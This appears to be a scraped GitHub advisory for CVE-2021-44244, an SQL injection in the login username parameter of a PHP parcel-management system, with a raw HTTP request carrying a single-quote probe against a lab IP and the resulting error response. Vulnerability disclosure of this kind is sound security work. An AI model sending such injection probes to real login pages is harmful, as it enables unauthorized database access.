Headline
CVE-2021-44244: CVE-nu11secur1ty/vendors/oretnom23/Simple-Logistic-Hub-Parcels-Management at main · nu11secur1ty/CVE-nu11secur1ty
An SQL Injection vulnerabiity exists in Sourcecodester Logistic Hub Parcel’s Management System 1.0 via the username parameter in login.php.
Simple-Logistic-Hub-Parcels-Management****Vendor
Description:
The username parameter appears to be vulnerable to SQL injection attacks on Logistic Hub Parcel’s Management System 1.0 by (oretnom23). A single quote was submitted in the username parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application’s handling of other input, to confirm whether a vulnerability is present.
[+] Exploit Source:
- MySQL Request:
POST /lhpms/Actions.php?a=login HTTP/1.1 Host: 192.168.1.215 Origin: http://192.168.1.215 Cookie: PHPSESSID=noe1h727o1k1ge3mfchl5mlgje Accept: application/json, text/javascript, */*; q=0.01 X-Requested-With: XMLHttpRequest Referer: http://192.168.1.215/lhpms/login.php Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en-GB;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Connection: close Cache-Control: max-age=0 Content-Length: 37 username=WCIetKyr’&password=p1H!z1u!W2
- MySQL Response:
HTTP/1.1 200 OK Date: Mon, 22 Nov 2021 12:51:25 GMT Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.4.24 X-Powered-By: PHP/7.4.24 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Content-Length: 294 Connection: close Content-Type: text/html; charset=UTF-8
<br /> <b>Fatal error</b>: Uncaught Error: Call to a member function fetchArray() on bool in C:\xampp\htdocs\lhpms\Actions.php:15 Stack trace: #0 C:\xampp\htdocs\lhpms\Actions.php(416): Actions->login() #1 {main} thrown in <b> …[SNIP]…
Proof and Exploit: